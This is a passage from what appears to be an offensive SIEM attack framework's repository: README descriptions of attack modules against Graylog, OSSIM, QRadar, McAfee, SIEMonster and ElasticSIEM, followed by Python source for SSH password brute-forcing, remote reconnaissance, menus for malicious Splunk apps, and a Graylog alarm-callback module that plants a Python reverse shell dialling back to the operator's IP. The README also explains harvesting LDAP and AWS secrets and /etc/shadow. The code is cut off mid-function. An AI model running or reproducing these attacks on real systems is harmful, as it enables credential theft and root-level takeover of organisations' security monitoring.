attacker’s IP address must be entered. For the reverse-shell payloads a listener must be running on the attacker’s IP before the application is installed; the installed application persists on the target until it is removed. 98 | 99 | 100 | ### Graylog Attack Modules 101 | 102 | By entering “y” and selecting the launch of the Graylog attack modules, the tool shows all the possible attacks that can be performed against this SIEM. For the first three attacks no credentials are required, but for the fourth one Graylog admin privileges are needed. 103 | 104 | #### 1st Attack: Dictionary Attack on Graylog Web Interface 105 | This attack module contains a specific dictionary for Graylog named dict.txt, which is made up of the 100 most used passwords of 2018 and various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. If you wish to use a different list, /graylog/dict.txt can be replaced with any other word list, provided that the file name is kept.
106 | 107 | #### 2nd Attack: Test for Graylog AMI/OVA Default Credentials 108 | This attack module checks whether the Graylog instance under analysis has default credentials on the Graylog web interface (admin/admin), as well as default credentials to connect to the system by console or SSH (ubuntu/ubuntu). These two credential pairs are configured by default on the Graylog virtual machine appliances, both OVA and AMI. 109 | 110 | #### 3rd Attack: Test connection to MongoDB and Obtain Credentials for LDAP and AWS 111 | This attack module checks whether the Graylog instance under analysis has its MongoDB database configured with no authentication. If so, it connects to MongoDB and obtains configuration information, LDAP credentials (depending on the Graylog version they may be in plain text or encrypted) and the access and secret keys configured in the AWS plugin. When the LDAP user's password is encrypted, it is encrypted with AES-CBC. The key is the first 16 bytes (characters, i.e. a 128-bit key) of the field password_secret — located in the configuration file server.conf, or graylog.conf for standard installations, or in the field secret_token of the file graylog-secrets.json for OVA installations — and the IV is the salt shown on the screen. 112 | 113 | #### 4th Attack: Obtain Credentials for LDAP and AWS from REST API 114 | This attack module obtains configuration information and LDAP and AWS credentials in plain text from the Graylog REST API. To use this module Graylog admin credentials are needed. 115 | 116 | 117 | ### Ossim Attack Modules 118 | By entering “y” and selecting the launch of the OSSIM attack modules, the tool shows all the possible attacks that can be performed against this SIEM. For the first attack no credentials are required, but for the subsequent ones OSSIM admin credentials are needed.
119 | 120 | #### 1st Attack: Dictionary Attack on OSSIM Web Interface 121 | This attack module contains a specific dictionary for OSSIM named dict.txt, which is made up of the 100 most used passwords of 2018 and various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. If you wish to use a different list, /ossim/dict.txt can be replaced with any other word list, provided that the file name is kept. 122 | 123 | #### 2nd Attack: Obtain OSSIM Configuration Information 124 | This attack module obtains configuration information from the OSSIM server. To use it, OSSIM admin credentials are needed; they can be obtained for instance through a dictionary attack (1st attack). The result of the module is the relevant configuration information of the current installation: defined users, login parameters including LDAP configuration, and password policies. 125 | 126 | #### 3rd Attack: Configure Malicious Policy and Action to Obtain Reverse Shell on OSSIM 127 | This attack module obtains a reverse shell from the OSSIM server to the attacker’s system. To use it, OSSIM admin credentials are needed; they can be obtained for instance through a dictionary attack (1st attack). The module creates a malicious action that connects back via netcat to the attacker’s system. Then it creates a new policy that uses that action to react when a security event occurs, and the event is triggered through an unsuccessful SSH login attempt to the OSSIM server. As a result, a reverse shell from the OSSIM server is received on the attacker’s system on port 12345 with root privileges, so a listener (for example nc -lvp 12345) must be running there beforehand. Both the action and the policy remain configured in OSSIM after the shell is obtained and should be removed during cleanup. 128 | 129 | 130 | ### QRadar Attack Modules 131 | By entering “y” and selecting the launch of the QRadar attack modules, the tool shows all the possible attacks that can be performed against this SIEM.
For the first two attacks no credentials are required, but for the subsequent ones QRadar admin credentials or an API key are needed. 132 | 133 | #### 1st Attack: Dictionary Attack on QRadar Web Interface 134 | This attack module contains a specific dictionary for QRadar named dict.txt, made up of the 100 most used passwords of 2018 and various permutations of the SIEM trade name and its admin user name, in uppercase and lowercase letters and with vowels replaced by digits. If you wish to use a different list, /qradar/dict.txt can be replaced with any other word list, provided that the file name is kept. This attack is very slow because QRadar enforces a login lockout that allows only 5 attempts every 30 minutes. 135 | 136 | #### 2nd Attack: Dictionary Attack on QRadar API Keys 137 | This attack module contains a specific dictionary for QRadar named apikeys.txt, made up of 1000 candidate API keys that follow the format this SIEM expects. If you wish to use a different list, /qradar/apikeys.txt can be replaced with any other key list, provided that the file name is kept. The module also offers to generate this file with randomly created API keys. 138 | 139 | #### 3rd Attack: Obtain QRadar Server Configuration Information 140 | This attack module obtains the server configuration using an API key. To use it, an admin-level QRadar API key is needed; it can be obtained, for instance, through the dictionary attack (2nd attack). The result of the module is the relevant configuration information of the current installation: defined users, network hierarchy, and deployment hosts. 141 | 142 | #### 4th Attack: Obtain list of usernames from the Ariel database on QRadar 143 | This attack module obtains the list of users stored in the Ariel database. 
To use it, an admin-level QRadar API key is needed; it can be obtained, for instance, through the dictionary attack (2nd attack). The result of the module is the relevant information about the users recorded in the Ariel database. 144 | 145 | 146 | ### McAfee Attack Modules 147 | By entering “y” and selecting the launch of McAfee attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first two attacks (both dictionary attacks) no credentials are required, but for the subsequent ones McAfee admin credentials are needed. 148 | 149 | #### 1st Attack: Dictionary Attack on McAfee Web Interface 150 | This attack module contains a specific dictionary for McAfee named dict.txt, made up of 7000 randomly generated passwords built from permutations of the SIEM trade name and its admin user name, in uppercase and lowercase letters and with vowels replaced by digits. If you wish to use a different list, /mcafee/dict.txt can be replaced with any other word list, provided that the file name is kept. This attack is very slow because McAfee enforces a login lockout that allows only 3 attempts every 10 minutes. 151 | 152 | #### 2nd Attack: Dictionary Attack on McAfee SSH Server 153 | This attack module contains a specific dictionary for McAfee named dict.txt, made up of 7000 randomly generated passwords built from permutations of the SIEM trade name and its admin user name, in uppercase and lowercase letters and with vowels replaced by digits. If you wish to use a different list, /mcafee/dict.txt can be replaced with any other word list, provided that the file name is kept. 154 | 155 | #### 3rd Attack: Obtain McAfee Server Configuration Information 156 | This attack module obtains the server configuration using admin credentials. 
To use it, SSH admin credentials are needed; they can be obtained, for instance, through the dictionary attack (2nd attack). The result of the module is the relevant configuration information of the current installation: name server on the network, active services, network configuration, and firewall configuration. 157 | 158 | #### 4th Attack: Obtain McAfee Server Information 159 | This attack module obtains general server information using admin credentials. To use it, SSH admin credentials are needed; they can be obtained, for instance, through the dictionary attack (2nd attack). The result of the module is the relevant information about the current installation: SIEM release number, HDD data, RAM data, processor data, active time (uptime), next status check date, status rules check date, and next backup date. 160 | 161 | #### 5th Attack: Obtain shadow file of McAfee Server 162 | This attack module retrieves the /etc/shadow file of the server using admin credentials. To use it, SSH admin credentials are needed; they can be obtained, for instance, through the dictionary attack (2nd attack). The result of the module is the list of system users together with their password hashes (reading /etc/shadow normally requires root privileges). 163 | 164 | 165 | ### SIEMonster Attack Modules 166 | By entering “y” and selecting the launch of SIEMonster attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first attack no credentials are required, but for the subsequent ones SIEMonster admin credentials are needed. 167 | 168 | #### 1st Attack: Dictionary Attack on SIEMonster SSH Interface 169 | This attack module contains a specific dictionary for SIEMonster named dict.txt, made up of 7000 randomly generated passwords built from permutations of the SIEM trade name and its admin user name, in uppercase and lowercase letters and with vowels replaced by digits. 
If you wish to use a different list, /siemonster/dict.txt can be replaced with any other word list, provided that the file name is kept. 170 | 171 | #### 2nd Attack: Obtain SIEMonster Server Information 172 | This attack module obtains the server configuration using admin credentials. To use it, SSH admin credentials are needed; they can be obtained, for instance, through the dictionary attack (1st attack). The result of the module is the relevant configuration information of the current installation: name server on the network, active Docker containers, list of active services, network configuration, and firewall configuration. 173 | 174 | #### 3rd Attack: Obtain shadow file of SIEMonster Server 175 | This attack module retrieves the /etc/shadow file of the server using admin credentials. To use it, SSH admin credentials are needed; they can be obtained, for instance, through the dictionary attack (1st attack). The result of the module is the list of system users together with their password hashes. 176 | 177 | 178 | ### ElasticSIEM Attack Modules 179 | By entering “y” and selecting the launch of ElasticSIEM attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first attack no credentials are required, but for the subsequent ones ElasticSIEM admin credentials are needed. 180 | 181 | #### 1st Attack: Dictionary Attack on ElasticSIEM SSH Server 182 | This attack module contains a specific dictionary for ElasticSIEM named dict.txt, made up of the 7000 most used passwords of 2018 and various permutations of the SIEM trade name and its admin user name, in uppercase and lowercase letters and with vowels replaced by digits. If you wish to use a different list, /elasticsiem/dict.txt can be replaced with any other word list, provided that the file name is kept. 
183 | 184 | #### 2nd Attack: Obtain ElasticSIEM Server Information 185 | This attack module obtains the server configuration using admin credentials. To use it, SSH admin credentials are needed; they can be obtained, for instance, through the dictionary attack (1st attack). The result of the module is the relevant configuration information of the current installation as collected over SSH: hostname, active services, network configuration, and listening ports. 186 | 187 | 188 | ## CONTRIBUTING AND SUPPORT 189 | 190 | Please report any error by opening an issue on GitHub. Your collaboration is very much appreciated! -------------------------------------------------------------------------------- /elasticsiem/bruteforcessh.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # ElasticSIEM SSH Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import nmap 9 | import logging 10 | import globals 11 | import paramiko 12 | 13 | from colorama import Fore 14 | from colorama import Style 15 | 16 | 17 | # %%%%%%%%%% Functions %%%%%%%%%# 18 | 19 | 20 | def elastic_ssh_brute(ip): 21 | username = input(Fore.CYAN + Style.NORMAL + 22 | "[!] 
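Enter username of operations system: ")
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    file = open(os.path.join(__location__, 'dict.txt'))
    nm = nmap.PortScanner()
    bps = 0  # becomes 1 once a password from dict.txt is accepted
    if username == '':
        username = 'root'

    try:
        # Only start guessing when nmap reports port 22 open; a host nmap
        # could not see raises KeyError on nm[ip] and ends in the except below.
        nm.scan(hosts=ip, arguments='-sT -T4 -p 22')
        if nm[ip]['tcp'][22]['state'] == 'open':
            for line in file:
                password = line.strip('\n\r')
                if ssh_credentials(ip, password, username):
                    mess = [username, password]
                    globals.messages(7)
                    globals.messages(9, mess)
                    file.close()
                    bps = 1
                    break
            if bps == 0:
                globals.messages(8)
                file.close()
        else:
            globals.messages(8)
            file.close()

    except Exception as e:
        # NOTE(review): any error from ssh_credentials other than a rejected
        # password (unreachable host, banner timeout, sshd rate limiting)
        # lands here and is reported as "Dictionary Attack Not Successful",
        # which can mask a transient network problem.
        globals.messages(8)
        file.close()
        logging.error(e, exc_info=True)


def ssh_credentials(ip, password, username):
    """Try one username/password pair against the SSH service on ``ip``.

    Returns True when the login is accepted and False when the server
    rejects the credentials (paramiko.AuthenticationException). Any other
    error (network, banner timeout, protocol) propagates to the caller.
    The client is closed on every path, so a successful guess no longer
    leaves an authenticated SSH session open.
    """
    ssh = paramiko.SSHClient()
    # AutoAddPolicy trusts whatever host key the server presents, so there is
    # no protection against an on-path host impersonating the target and
    # harvesting the credentials being tested. Acceptable for a credential
    # probe in an attack tool; do not reuse this pattern for sensitive data.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # banner_timeout is in seconds; no connect timeout is set, so an
        # unresponsive host can block this call for a long time.
        ssh.connect(ip, username=username, password=password,
                    banner_timeout=2000)
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        ssh.close()
--------------------------------------------------------------------------------
/elasticsiem/sysinfo_elastic.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

# Obtain system info of ElasticSIEM with SSH

# %%%%%%%%%%% Libraries %%%%%%%%%%%#

import getpass

import globals
import paramiko
from colorama import Fore
from colorama import Style

# %%%%%%%%%% Functions %%%%%%%%%#


def elastic_ssh_info(ip):
    username = input(Fore.CYAN + Style.NORMAL +
                     "[!] Enter ElasticSIEM's username: " + Style.RESET_ALL)
    # getpass keeps the password off the terminal (and out of scrollback and
    # session recordings), matching what graylog/alarmcallback.py already does.
    password = getpass.getpass(Fore.CYAN + Style.NORMAL +
                               "[!] 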
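Enter ElasticSIEM's password: " + Style.RESET_ALL)

    ssh = paramiko.SSHClient()
    ssh.load_system_host_keys()
    # AutoAddPolicy silently trusts unknown host keys, so the output printed
    # below could in principle come from an impostor host. Acceptable for an
    # attack tool; not a pattern to copy where server authenticity matters.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip, username=username, password=password,
                    banner_timeout=200)
        globals.elastic_messages(1)

        # (remote command, heading printed above its output)
        commands = [
            ("hostname", "[!] Hostname"),
            ("ls -1 /etc/rc5.d", "[!] List service active"),
            ("ifconfig", "[!] Network Configuration"),
            ('netstat -putan | grep LISTEN', "[!] Ports active")
        ]

        for command in commands:
            std, stdout, stderr = ssh.exec_command(command[0])
            # exec_command returns file-like channel objects, so there is no
            # empty-string case to test for: the heading is always printed.
            print('')
            print(Fore.GREEN + Style.NORMAL + command[1])
            print(Fore.GREEN + Style.NORMAL + globals.SEPARATOR +
                  Style.RESET_ALL)
            for i in stdout.readlines():
                print('[!] ' + i.replace('\n', ''))

    except paramiko.AuthenticationException:
        globals.messages(10)
    finally:
        # Close on every path (success, rejected password, or any other
        # connection error that propagates) instead of leaking the session.
        ssh.close()

# %%%%%%%%%% The End %%%%%%%%%%#
--------------------------------------------------------------------------------
/globals.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

# Variables and Functions globals in Framework

# %%%%%%%%%%% Libraries %%%%%%%%%%%#

from colorama import Fore, Style

# %%%%%%%%%%% Constants %%%%%%%%%%%#

SEPARATOR = "[*] {0} [*]".format('=' * 110)
SSH_PORT = 22
HTTPS_TCP_PORT = 443
SPLUNK_TCP_PORT = 8089
GRAYLOG_TCP_PORT = 9000
ELASTIC_TCP_PORT = 5601

https = "https://"
http = "http://"


# Dotted-quad IPv4 address, each octet 0-255. Presumably used by scanning.py
# to validate operator-supplied targets before they reach nmap/paramiko/
# requests — confirm against the caller.
ip_val = '''^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)$'''
net_val = 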
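'''^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)/(3[0-2]|[0-2]?[0-9])$'''
# CIDR network: dotted-quad address plus a prefix length of 0-32. The prefix
# group is restricted to 0-32 so that values such as "10.0.0.0/99" are
# rejected at validation time rather than failing later inside nmap.

# Browser User-Agent strings presented by the HTTP-based modules.
agents = [
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)'
    ' Chrome/79.0.3945.88 Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0',
    'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0',
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)'
    ' Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41'
]


# %%%%%%%%%%% Menus %%%%%%%%%%%#
main_menu = ["Scan and Detect SIEM",
             "Find SIEMs on the network"]
# "Update SIEMs Framework",
# "Update Supporting Components"

splunk_menu = ["Dictionary Attack on Splunk Server or Universal Forwarder User"
               " Admin via Management Port",
               "Obtain Server and Session Information via Web Interface",
               "Obtain Server or Universal Forwarder System Information via "
               "Management Port (Admin Credentials Needed)",
               "Obtain Splunk Server Apps Stored Passwords with Secret "
               "(Admin Credentials Needed)",
               "Read /etc/shadow file from Splunk Server "
               "(Linux Only - Admin Credentials Needed)",
               "Deploy Malicious App to Forwarders via Deployment Server "
               "(Admin Credentials Needed)",
               "Upload Malicious App to Splunk Server or Universal Forwarder "
               "(Admin Credentials Needed)",
               "Test for Splunk VMware OVA Default Credentials"
               ]

graylog_menu = ["Dictionary Attack on Graylog Web Interface User Admin",
                "Test for AMI/OVA Default Credentials",
                "Obtain Configuration and Credentials for LDAP and AWS from "
                "REST API (Admin Credentials Needed)",
                "Obtain Credentials in Graylog Inputs from REST API "
                "(Admin Credentials Needed)",
                "Create and Test Alarm Callback to Obtain Reverse Shell "
                "(Admin 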
Credentials Needed)" 65 | ] 66 | 67 | ossim_menu = ["Dictionary Attack on OSSIM Web Interface User Admin", 68 | "Obtain OSSIM Server Configuration Information " 69 | "(Admin Credentials Needed)", 70 | "Upload OSSIM Malicious Policy and Action to Obtain Reverse " 71 | "Shell (AdminCredentials Needed)" 72 | ] 73 | 74 | qradar_menu = ["Dictionary Attack on QRadar Web Interface User Admin " 75 | "(Very Slow)", 76 | "Dictionary Attack on QRadar with API Key of User Admin", 77 | "Obtain QRadar Server Configuration Information " 78 | "(API Key Needed)", 79 | "Obtain list of usernames of databases Ariel on QRadar " 80 | "(API Key Needed)" 81 | ] 82 | 83 | mcafee_menu = ["Dictionary Attack on McAfee Web Interface User Admin (Slow)", 84 | "Dictionary Attack on McAfee SSH of User Admin", 85 | "Obtain McAfee Server Configuration (Admin Credentials Needed)", 86 | "Obtain McAfee Server Information (Admin Credentials Needed)", 87 | "Obtain shadow file of server (Admin Credentials Needed)" 88 | ] 89 | 90 | smonster_menu = ["Dictionary Attack on SIEMonster SSH of User Admin", 91 | "Obtain SIEMonster Information (Admin Credentials Needed)", 92 | "Obtain shadow file of server (Admin Credentials Needed)" 93 | ] 94 | 95 | elastic_menu = ["Dictionary Attack on ElasticSIEM SSH of User Admin", 96 | "Obtain ElasticSIEM Server Information " 97 | "(Admin Credentials Needed)" 98 | ] 99 | 100 | app_menu = ["Linux Splunk Server or Universal Forwarder Reverse Shell", 101 | "Linux Splunk Server or Universal Forwarder Bind Shell", 102 | "Windows Splunk Server Reverse Shell", 103 | "Windows Splunk Server Bind Shell", 104 | "Windows Splunk Universal Forwarder Add Administrator User", 105 | "Windows Splunk Universal Forwarder Executable Bind Shell" 106 | ] 107 | 108 | username = "[!] Username: " 109 | password = "[!] 
Password: " 110 | 111 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 112 | 113 | 114 | def messages(op, message=None): 115 | if message is None: 116 | message = [] 117 | print('\n') 118 | print(Fore.GREEN + Style.BRIGHT + SEPARATOR) 119 | if op == 1: 120 | print(Fore.GREEN + Style.BRIGHT + '[!] Select from the menu: ') 121 | elif op == 2: 122 | print(Fore.YELLOW + Style.BRIGHT + 123 | '[!] Choice error please select again: ') 124 | elif op == 3: 125 | print(Fore.YELLOW + Style.BRIGHT + 126 | '[*] IP or Port data error. Try again') 127 | elif op == 4: 128 | print(Fore.YELLOW + Style.BRIGHT + '[*] Net data error. Try again') 129 | elif op == 5: 130 | print(Fore.YELLOW + "[!] The SIEM detected is: " + Fore.RED + 131 | Style.BRIGHT + message[0]) 132 | print(Fore.YELLOW + "[!] The SIEM is working on the port: " + 133 | Fore.RED + Style.BRIGHT + message[1]) 134 | elif op == 6: 135 | print(Fore.YELLOW + Style.BRIGHT + 136 | "[!] SIEMs Detected on the Network: ") 137 | elif op == 7: 138 | print(Fore.GREEN + Style.BRIGHT + "[!] Dictionary Attack Successful!") 139 | elif op == 8: 140 | print(Fore.RED + Style.BRIGHT + 141 | "[!] Dictionary Attack Not Successful") 142 | elif op == 9: 143 | print(Fore.YELLOW + Style.BRIGHT + username + 144 | Fore.RED + Style.BRIGHT + message[0]) 145 | print(Fore.YELLOW + password + Fore.RED + Style.BRIGHT + message[1]) 146 | elif op == 10: 147 | print(Fore.RED + Style.BRIGHT + "[*] Authentication Error") 148 | 149 | print(Fore.GREEN + Style.BRIGHT + SEPARATOR + Style.RESET_ALL) 150 | 151 | 152 | def splunk_messages(op, message=None): 153 | if message is None: 154 | message = [] 155 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 156 | if op == 1: 157 | print(Fore.GREEN + Style.NORMAL + "[!] List of Installed Apps:") 158 | elif op == 2: 159 | print(Fore.GREEN + Style.NORMAL + 160 | "[!] Application Successfully Installed " 161 | + Fore.RED + Style.BRIGHT + message[0]) 162 | elif op == 3: 163 | print(Fore.RED + Style.NORMAL + 164 | "[!] 
Error with the app selection [!]") 165 | elif op == 4: 166 | print(Fore.GREEN + Style.NORMAL + 167 | "[!] Currently stored credentials:") 168 | elif op == 5: 169 | print("[*] Credential Name: " + message[0]) 170 | print("[*] Username: " + Fore.RED + Style.BRIGHT + message[1]) 171 | print("[*] Encrypted Password: " + message[2]) 172 | print("[*] Clear Password: " + Fore.RED + Style.BRIGHT + message[3]) 173 | elif op == 6: 174 | print(Fore.GREEN + Style.NORMAL + "[!] Splunk Server Information") 175 | elif op == 7: 176 | print(Fore.GREEN + Style.NORMAL + "[!] Splunk Session Information") 177 | elif op == 8: 178 | print(Fore.GREEN + Style.NORMAL + "[!] Splunk Config Web") 179 | elif op == 9: 180 | print(Fore.GREEN + Style.NORMAL + "[!] File /etc/shadow content:") 181 | elif op == 10: 182 | print(Fore.GREEN + Style.NORMAL + 183 | "[!] Splunk VMWare OVA SSH Default Credentials Found!") 184 | elif op == 11: 185 | print(Fore.GREEN + Style.NORMAL + 186 | "[!] Splunk SSH Default Credential for " 187 | + message[0] + " Not Found") 188 | 189 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 190 | 191 | 192 | def ossim_messages(op, message=None): 193 | if message is None: 194 | message = [] 195 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 196 | if op == 1: 197 | print(Fore.GREEN + Style.NORMAL + 198 | "[!] Start a listener in port 12345, for example nc -lvp 12345") 199 | elif op == 2: 200 | print(Fore.GREEN + Style.NORMAL + 201 | "[!] OSSIM Reverse Shell Action Created with ID " + message[0]) 202 | print(Fore.GREEN + Style.NORMAL + 203 | "[!] OSSIM Policies CTX Obtained " + message[1]) 204 | elif op == 3: 205 | print(Fore.RED + Style.NORMAL + 206 | "[!] Error creating the OSSIM Reverse Shell Action") 207 | elif op == 4: 208 | print(Fore.GREEN + Style.NORMAL + "[!] OSSIM New Policy Created") 209 | elif op == 5: 210 | print(Fore.GREEN + Style.NORMAL + "[!] Policies Reloaded and Applied") 211 | elif op == 6: 212 | print(Fore.RED + Style.NORMAL + 213 | "[!] 
Error creating the OSSIM New Policy") 214 | elif op == 7: 215 | print(Fore.RED + Style.NORMAL + "[!] SSH Failed Login Event Generated") 216 | print(Fore.RED + Style.BRIGHT + "[!] Reverse Shell Ready") 217 | elif op == 8: 218 | print(Fore.GREEN + Style.NORMAL + 219 | "[!] OSSIM Users, Emails and Company") 220 | elif op == 9: 221 | print(Fore.GREEN + Style.NORMAL + 222 | "[!] OSSIM Login Methods and Parameters") 223 | elif op == 10: 224 | print(Fore.GREEN + Style.NORMAL + "[!] OSSIM Password Policies") 225 | 226 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 227 | 228 | 229 | def graylog_messages(op): 230 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 231 | if op == 1: 232 | print(Fore.GREEN + Style.NORMAL + 233 | "[!] Graylog LDAP Settings and Credentials") 234 | elif op == 2: 235 | print(Fore.GREEN + Style.NORMAL + 236 | "[!] Error obtaining Graylog LDAP Settings and Credentials") 237 | elif op == 3: 238 | print(Fore.GREEN + Style.NORMAL + 239 | "[!] Graylog AWS Settings and Credentials") 240 | elif op == 4: 241 | print(Fore.GREEN + Style.NORMAL + 242 | "[!] Error obtaining Graylog AWS Settings and Credentials") 243 | elif op == 5: 244 | print(Fore.GREEN + Style.NORMAL + 245 | "[!] Graylog Inputs with Secret Keys or Passwords") 246 | elif op == 6: 247 | print(Fore.RED + Style.NORMAL + "[!] Error obtaining Graylog Inputs") 248 | elif op == 7: 249 | print(Fore.RED + Style.NORMAL + "[!] Mongo DB without Authentication") 250 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 251 | print(Fore.GREEN + Style.NORMAL + "[!] LDAP Settings") 252 | elif op == 8: 253 | print(Fore.GREEN + Style.NORMAL + 254 | "[!] LDAP Password Encrypted with AES CBC, Key is" 255 | " Graylog PasswordSecret and IV is the Salt") 256 | elif op == 9: 257 | print(Fore.GREEN + Style.NORMAL + "[!] AWS Access Key and Secret Key") 258 | elif op == 10: 259 | print(Fore.RED + Style.NORMAL + 260 | "[!] 
Problem with MongoDB Authentication") 261 | elif op == 11: 262 | print(Fore.RED + Style.NORMAL + 263 | "[!] MongoDB port is closed or unreachable") 264 | elif op == 12: 265 | print(Fore.GREEN + Style.NORMAL + 266 | "[!] Graylog Web Interface Default Credentials Found!") 267 | elif op == 13: 268 | print(Fore.RED + Style.NORMAL + 269 | "[!] Graylog Web Interface Default Credentials" 270 | " Not Found, Try Bruteforce Module") 271 | elif op == 14: 272 | print(Fore.GREEN + Style.NORMAL + 273 | "[!] Graylog SSH Default Credentials Found!") 274 | elif op == 15: 275 | print(Fore.RED + Style.NORMAL + 276 | "[!] Graylog SSH Default Credentials Not Found") 277 | 278 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 279 | 280 | 281 | def qradar_messages(op, message=''): 282 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 283 | if op == 1: 284 | print(Fore.RED + Style.BRIGHT + 285 | "[*] Error with number entered for quantity apikey") 286 | elif op == 2: 287 | print("[!] API Key: " + Fore.RED + Style.BRIGHT + message) 288 | elif op == 3: 289 | print(Fore.GREEN + Style.NORMAL + "[!] System information of QRadar :") 290 | elif op == 4: 291 | print(Fore.GREEN + Style.NORMAL + "[!] Users of QRadar :") 292 | elif op == 5: 293 | print(Fore.GREEN + Style.NORMAL + 294 | "[!] Networks configured in QRadar :") 295 | elif op == 6: 296 | print(Fore.GREEN + Style.NORMAL + 297 | "[!] Query of usernames AQL was Successful!") 298 | elif op == 7: 299 | print(Fore.RED + Style.NORMAL + 300 | "[!] Query of usernames AQL wasn't Successful!") 301 | 302 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 303 | 304 | 305 | def mcafee_messages(op): 306 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 307 | if op == 1: 308 | print(Fore.GREEN + Style.NORMAL + "[!] 
System information of McAfee :") 309 | elif op == 2: 310 | print(Fore.GREEN + Style.BRIGHT + "[*] Users McAfee server:") 311 | 312 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 313 | 314 | 315 | def smonster_messages(op): 316 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 317 | if op == 1: 318 | print(Fore.GREEN + Style.NORMAL + 319 | "[!] System information of SIEMonster :") 320 | elif op == 2: 321 | print(Fore.GREEN + Style.BRIGHT + "[*] Users SIEMonter Server:") 322 | 323 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 324 | 325 | 326 | def elastic_messages(op): 327 | if op == 1: 328 | print(Fore.GREEN + Style.NORMAL + 329 | "[!] System information of ElasticSIEM: ") 330 | 331 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 332 | -------------------------------------------------------------------------------- /graylog/alarmcallback.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Create Alarm Callback to Obtain Reverse Shell 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import getpass 8 | import logging 9 | import urllib3 10 | import globals 11 | import requests 12 | import colorama 13 | 14 | from colorama import Fore 15 | from colorama import Style 16 | 17 | colorama.init() 18 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 19 | 20 | # %%%%%%%%%% Functions %%%%%%%%%# 21 | 22 | 23 | def alarm_callback(ip, port): 24 | graylogpass = getpass.getpass( 25 | Fore.CYAN + Style.BRIGHT + "[!] Enter Graylog Admin Password: " + 26 | Style.RESET_ALL) 27 | 28 | local_ip = input("[!] 
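Enter your local IP address: ")
    # Sentinel meaning "no callback created yet"; replaced by the id Graylog
    # returns when the POST below succeeds.
    alertid = "000000000000000000000000"
    authurl = globals.http + ip + ":" + str(
        port) + "/api/system/sessions"
    typesurl = globals.http + ip + ":" + str(
        port) + "/api/alerts/callbacks/types"
    # Stream 000000000000000000000001 — presumably Graylog's built-in default
    # stream, so the callback fires for every message; confirm on the target.
    alarmsurl = globals.http + ip + ":" + str(
        port) + "/api/streams/000000000000000000000001/alarmcallbacks"

    # Command the ExeCommand alarm-callback plugin runs on the Graylog host:
    # a Python reverse shell dialling back to local_ip:12345, so a listener
    # (e.g. nc -lvp 12345) must already be running on the attacker's side.
    bashcommand = \
        "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"\
        "socket.SOCK_STREAM);s.connect((\"" + local_ip + \
        "\",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),"\
        "1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'"

    params = {
        "title": "testgraylog",
        "type": "ir.elenoon.ExeCommandAlarmCallBack",
        "configuration": {
            "bashCommand": bashcommand
        }
    }
    headers = {'X-Requested-By': 'XMLHttpRequest'}
    authparams = {
        'username': 'admin',
        'password': graylogpass,
        'host': ip
    }

    # NOTE(review): in globals.py, graylog_messages() ids 1-8 print the
    # LDAP/AWS/inputs texts, not alarm-callback progress; the ids used in this
    # module look out of sync with globals.py and should be re-checked.
    globals.graylog_messages(1)
    try:
        s = requests.Session()
        s.headers.update(headers)
        # The admin password travels in clear text: globals.http is plain
        # HTTP, and verify=False would disable TLS validation even over HTTPS.
        s.auth = ('admin', graylogpass)
        authresponse = s.post(authurl, json=authparams, verify=False,
                              timeout=30)
        # Bail out on a rejected password (200 is what bruteforcegraylog.py
        # treats as a successful session) instead of letting every later call
        # fail and be reported as a plugin or creation problem.
        if authresponse.status_code != 200:
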